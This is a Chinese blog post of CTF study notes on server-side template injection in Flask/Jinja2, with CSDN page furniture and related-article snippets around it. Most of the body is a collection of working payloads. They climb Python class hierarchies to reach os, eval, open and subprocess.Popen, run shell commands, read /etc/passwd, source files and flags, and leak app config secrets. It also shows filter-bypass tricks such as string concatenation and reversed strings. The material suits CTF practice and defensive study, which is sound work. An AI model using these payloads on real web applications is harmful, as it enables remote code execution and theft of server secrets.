SSTI-模板注入小知识

已于 2022-02-09 17:50:12 修改
阅读量358 收藏 4
点赞数 1
分类专栏: webctf 文章标签: python web flask
于 2021-07-24 14:14:38 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_51326092/article/details/119057232
版权

文章目录

SSTI

借鉴大佬博客:
https://www.cnblogs.com/20175211lyz/p/11425368.html
CTF引出对Python模板注入的思考
浅析SSTI(python沙盒绕过)

简要介绍

SSTI 全称Server Side Template Injection,服务器模板注入。
模板注入涉及的是服务端Web应用使用模板引擎渲染用户请求的过程,服务端把用户输入的内容渲染成模板就可能造成SSTI。
模板引擎(这里特指用于Web开发的模板引擎)是为了使用户界面与业务数据(内容)分离而产生的,它可以生成特定格式的文档,用于网站的模板引擎就会生成一个标准的HTML文档。
一些模板引擎:Smarty,Mako,Jinja2,Jade,Velocity,Freemaker和Twig

flask/jinja

flask和django貌似都是使用templates来实现模板的。
而flask中使用的是Jinja2引擎。
Jinja2引擎存在以下三种语法:
控制结构 {% %}
变量取值 {{ }}
注释 {# #}

__dict__ 保存类实例或对象实例的属性变量键值对字典  __class__  返回类型所属的对象
__mro__    返回一个包含对象所继承的基类元组,方法在解析时按照元组的顺序解析。
__bases__   返回该对象所继承的基类
__base__和__mro__都是用来寻找基类的
__subclasses__   每个新类都保留了子类的引用,这个方法返回一个类中仍然可用的的引用的列表
__init__  类的初始化方法
__globals__  对包含函数全局变量的字典的引用

获取基本类

‘’.class.mro[2]
{}.class.bases[0]
().class.bases[0]
[].class.bases[0]
request.class.mro[8] //针对jinjia2/flask为[9]适用

{{config}}

{{ config.items() }} // 查看配置项目的信息

可以获取当前设置,
如果题目有语句

app.config ['FLAG'] = os.environ.pop('FLAG'

那可以直接访问 {{config[‘FLAG’]}} 或者 {{config.FLAG}} 得到flag

也可以使用{{self}}获取当前设置
使用 {{self.dict._TemplateReference__context.config}}
也可以找到当前设置config

一些注入语句:

{{os.listdir('.')}} 访问当前目录下的文件有哪些

{{[].__class__.__base__.__subclasses__()}}访问所有模块

知道访问os模块都是从warnings.catch_warnings模块入手的。

找到catch_warnings的位置(上面查到的所有模块的索引,假如是59,即第59个模块)

{}.__class__.__bases__[0].__subclasses__()[60].__init__

{{[].__class__.__base__.__subclasses__()[59].__init__.func_globals.keys()}}
可以查询到一些global函数,进入含有os模块的函数

{{[].__class__.__base__.__subclasses__()[59].__init__.func_globals['linecache'].__dict__}}
找寻到os模块

{{[].__class__.__base__.__subclasses__()[59].__init__.func_globals['linecache'].__dict__['o'+'s']}}
使用上面语句代替os模块使用

[].__class__.__base__.__subclasses__()[59].__init__.func_globals['linecache'].__dict__['o'+'s'].read()

[].__class__.__base__.__subclasses__()[59].__init__.func_globals['linecache'].__dict__['o'+'s'].open()

{{[].__class__.__base__.__subclasses__()[59].__init__.func_globals['linecache'].__dict__['o'+'s'].read([].__class__.__base__.__subclasses__()[59].__init__.func_globals['linecache'].__dict__['o'+'s'].open("flag",[].__class__.__base__.__subclasses__()[59].__init__.func_globals['linecache'].__dict__['o'+'s'].O_RDONLY),40)}}



python3
{{().__class__.__bases__[0].__subclasses__()[177].__init__.__globals__.__builtins__['open']('/flag').read()}}
{{().__class__.__bases__[0].__subclasses__()[75].__init__.__globals__.__builtins__['eval']("__import__('os').popen('whoami').read()")}}


{{().__class__.__bases__[0].__subclasses__()[75].__init__.__globals__.__builtins__['open']('/etc/passwd').read()}}进行文件读取


不用找类
{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__']['__imp'+'ort__']('o'+'s').listdir('/')}}{% endif %}{% endfor %}
//列文件

{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen(request.args.input).read()}}{%endif%}{%endfor%}

{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].open('app.py','r').read() }}{% endif %}{% endfor %}

{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].open('txt.galf_eht_si_siht/'[::-1],'r').read() }}{% endif %}{% endfor %}

{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].open('/this_is_the_fl'+'ag.txt','r').read()}}{% endif %}{% endfor %}

ban了globals:

采用了字符串拼接的形式['__glo'+'bals__']

{{[].__class__.__base__.__subclasses__()[59].__init__['__glo'+'bals__'].keys()}}

{{[].__class__.__base__.__subclasses__()[59].__init__['__glo'+'bals__']['linecache'].__dict__['o'+'s']}}

{{[].__class__.__base__.__subclasses__()[59].__init__['__glo'+'bals__']['linecache'].__dict__['o'+'s'].popen('ls').read()}}

{{[].__class__.__base__.__subclasses__()[59].__init__['__glo'+'bals__']['__builtins__']['eval']("__import__('os').popen('ls').read()")}}

{{[].__class__.__base__.__subclasses__()[59].__init__['__glo'+'bals__']['__builtins__']['eval']("__import__('os').popen('ls /flasklight').read()")}}

 {{[].__class__.__base__.__subclasses__()[59].__init__['__glo'+'bals__']['__builtins__']['eval']("__import__('os').popen('cat /flasklight/coomme_geeeett_youur_flek ').read()")}}

如果config,self不能使用,要获取配置信息,可以使用下面的语句:

{{url_for.__globals__['current_app'].config.FLAG}}
{{get_flashed_messages.__globals__['current_app'].config.FLAG}}
{{request.application.__self__._get_data_for_json.__globals__['json'].JSONEncoder.default.__globals__['current_app'].config['FLAG']}}
在实际场景中,把FLAG修改一下就可以使用了

可以利用的类 利用subprocess.Popen执行命令

{{''.__class__.__mro__[2].__subclasses__()[258]('ls',shell=True,stdout=-1).communicate()[0].strip()}}
{{''.__class__.__mro__[2].__subclasses__()[258]('ls /flasklight',shell=True,stdout=-1).communicate()[0].strip()}}
{{''.__class__.__mro__[2].__subclasses__()[258]('cat /flasklight/coomme_geeeett_youur_flek',shell=True,stdout=-1).communicate()[0].strip()}}
//如果burpsuit返回400,记得url编码一下再传!

Flask的重要知识点:
GYCTF2020 Flaskapp预期官方题解(Flask的debug模式)

总结

会持续更新的~~~~

Sakura-501
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
ssti-payload:SSTI有效载荷生成器
02-06
SSTI有效载荷发生器 该生成器是针对特定类型的Java SSTI的,其受以下启发: ${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99)....
ssti-payloads::bullseye:服务器端模板注入有效负载
04-13
服务器端模板注入有效负载 服务器端模板注入是指攻击者能够使用本机模板语法将恶意有效载荷注入模板中,然后在服务器端执行该模板模板引擎旨在通过将固定模板与易失性数据结合来生成网页。 当用户输入直接连接...
SSTI模板注入
huangyongkang666的博客
03-21 9807
SSTI模板注入 1.SSTI简介 SSTI 就是服务器端模板注入(Server-Side Template Injection) ​ 当前使用的一些框架,比如pythonflask,php的tp,java的spring等一般都采用成熟的的MVC的模式,用户的输入先进入Controller控制器,然后根据请求类型和请求的指令发送给对应Model业务模型进行业务逻辑判断,数据库存取,最后把结果返回给View视图层,经过模板渲染展示给用户。 ​ 漏洞成因就是服务端接收了用户的恶意输入以后,未经任何处理就将
2024年最全SSTI模板注入详细总结及WAF绕过_fenjing ssti(3),2024年最新已开源
最新发布
2401_84253894的博客
05-05 1009
{{‘’.class__}}里的两个单引号意思是随便找一个对象,我们会在网上看到别人的wp有时候是{{().class__}},{{“”.class__}}或者{{[].class__}}区别只是包裹的是字符,元组还是列表,仅是返回的数据类型不同,本质无区别,如果被过滤可以互相替代。如果等保模块学的好,还可以从事等保工程师。当我学到一定基础,有自己的理解能力的时候,会去阅读一些前辈整理的书籍或者手写的笔记资料,这些笔记详细记载了他们对一些技术点的理解,这些理解是比较独到,可以学到不一样的思路。
详解SSTI模板注入
LYJ20010728的博客
09-09 3891
详解SSTI模板注入SSTI简介常见的模板引擎PHPJAVAPYTHONRUBYGOLANGSSTI产生的原因常用检测工具 TplmapFlask/Jinja模板引擎的相关绕过Flask简介demo漏洞代码基础知识沙盒逃逸Python的内建函数名称空间类继承寻找Python-SSTI攻击载荷的过程攻击载荷过程常用的目标函数常见的中间对象fuzz可利用类脚本服务端fuzzPython常用的命令执行方式Python-Web框架配置文件TornadoflaksFlask过滤器定义使用方式用的过滤器模块查找脚本常见
SSTI模板注入漏洞
就是我的博客
09-04 342
当前使用的一些框架,比如pythonflask,php的tp,java的spring等一般都采用成熟的的MVC的模式,用户的输入先进入Controller控制器,然后根据请求类型和请求的指令发送给对应Model业务模型进行业务逻辑判断,数据库存取,最后把结果返回给View视图层,经过模板渲染展示给用户。也就是说例如:{{}}在Jinja2中作为变量包裹标识符,Jinja2在渲染的时候会把{{}}包裹的内容当做变量解析替换。比如{{1+1}}会被解析成2。
SSTI模板注入总结
热门推荐
Manuffer的博客
10-13 1万+
文章目录一、初识SSTI二、判断SSTI类型三、常用类1、__class__2、__bases__3、__subclasses__()4、类的知识总结(转载)5、常见过滤器(转载)四、CTF例题[BJDCTF]The mystery of ip[Bugku]Simple_SSTI_1 一、初识SSTI 1、什么是SSTISSTI就是服务器端模板注入(Server-Side Template Injection),实际上也是一种注入漏洞。 可能SSTI对大家而言不是很熟悉,但是相信大家很熟悉SQL注入。实
SSTI(模板注入)
xiaolong22333的博客
02-28 1484
概念性的东西这里就不讲了,毕竟像我这种刚开始学ssti,且没什么Python基础的小白来说,要是一上来就巴拉巴拉讲一堆概念,可能直接就懵了。 首先认识一下这个东西 __class__ 它可以用来查看变量所属的类 什么意思呢?动手试一下就知道了。用命令行打开python,输入''.__class__ 可以看到输出了<class 'str'>,表明这是str类,当然还有另外的类型,可以依次输入().__class__,[].__class__,{}.__class__ str(字符串)、di.
ssti模板注入学习笔记
m0_73559432的博客
04-15 661
学习ssti模板注入的笔记。课程是b站橙子老师的课,https://www.bilibili.com/video/BV1tj411u7Bx?p=22&vd_source=9f6c2d32d65865d972cf6825021e3b6f,讲的真的很详细,推荐听一听。
SSTI模板注入详细总结及WAF绕过
2301_76690905的博客
11-15 1992
模板引擎是用于Web开发的工具,其作用是将用户界面和业务数据分离。通过模板引擎,我们可以根据特定的格式要求生成文档。使用模板引擎,我们只需要提供用户数据,然后将数据传递给渲染函数,模板引擎会根据提供的数据生成对应的前端HTML页面,最终呈现在用户的浏览器中。
SSTI模板注入学习
oyf3085227433的博客
03-06 1245
简单总结一下学习到的SSTI相关知识
Flask框架-SSTI模板注入漏洞
soldi_er的博客
04-30 1484
文章目录使用Flask搭建网站模板渲染flask有2个渲染方法测试代码1测试代码2存在漏洞的代码,测试代码3利用模板注入漏洞环境准备魔术方法和模块利用漏洞Payload测试和收录参考 使用Flask搭建网站   1、本地环境: 环境 版本 编辑器 Pycharm/2019.3.3 开发语言 Python/3.7.6 框架 Flask/1.1.1 渲染 Jinja2/2.11.1 Response指纹 Server: Werkzeug/1.0.0 Python/3.7.6
gentlexue#POC-3#Apache OfBiz 服务器端模板注入SSTI)1
07-25
Apache OfBiz 服务器端模板注入SSTI)Apache OfBiz 17.12.01容易受到服务器端模板注入SSTI)的影响,从而导致远程代码执行
fenjing工具,ssti
12-17
标题中的“fenjing工具,ssti”指的是Fenjing,一个可能用于安全测试或Web应用漏洞扫描的工具,而“ssti”则是Server-Side Template Injection(服务器端模板注入)的缩写,这是一种常见的Web应用程序安全漏洞。...
Server-Side-Template-Injection-RCE-For-The-Modern-Web-App-wp.pdf
11-30
1. **Detect**(检测):识别可能存在的模板注入漏洞,通过分析应用程序的输入和输出模式来发现不安全的用户输入处理。 2. **Identify**(识别):确定模板引擎类型和版本,这对于了解可能的exploit和潜在的漏洞至关...
模板注入与_FLASK.pdf
01-02
**模板注入(SSTI)详解** 模板注入,全称为Server Side Template Injection,是一种常见的Web应用程序安全漏洞,它允许攻击者将恶意输入作为模板字符串的一部分,从而在服务端的模板引擎解析时执行函数调用或命令,...
SSTI
03-09
利用SSTI则需要对目标应用的模板引擎有深入理解,构建有效的注入payload。例如,针对Jinja2模板引擎,攻击者可能尝试`{{ __import__('os').system('ls') }}`这样的payload来执行系统命令。 ### 常见的SSTI攻击场景 ...
tplmap.zip
07-26
模板注入通常发生在应用使用模板引擎解析用户输入时,没有对输入数据进行充分的验证和过滤。这些模板引擎如Jinja2、Smarty、FreeMarker等,在处理动态内容时,如果直接将未经处理的用户输入嵌入到模板中,就可能导致...
ssti-lab靶场通关
09-02
为了通关ssti-lab靶场,你可以按照以下步骤进行操作: 1. 首先,从上一个数据库中找到的password字典中获取到mssql的账户密码。 2. 使用这个账户密码进行mssql的暴力破解,以获得访问权限。 3. 一旦你获得了访问权限...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Sakura-501

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值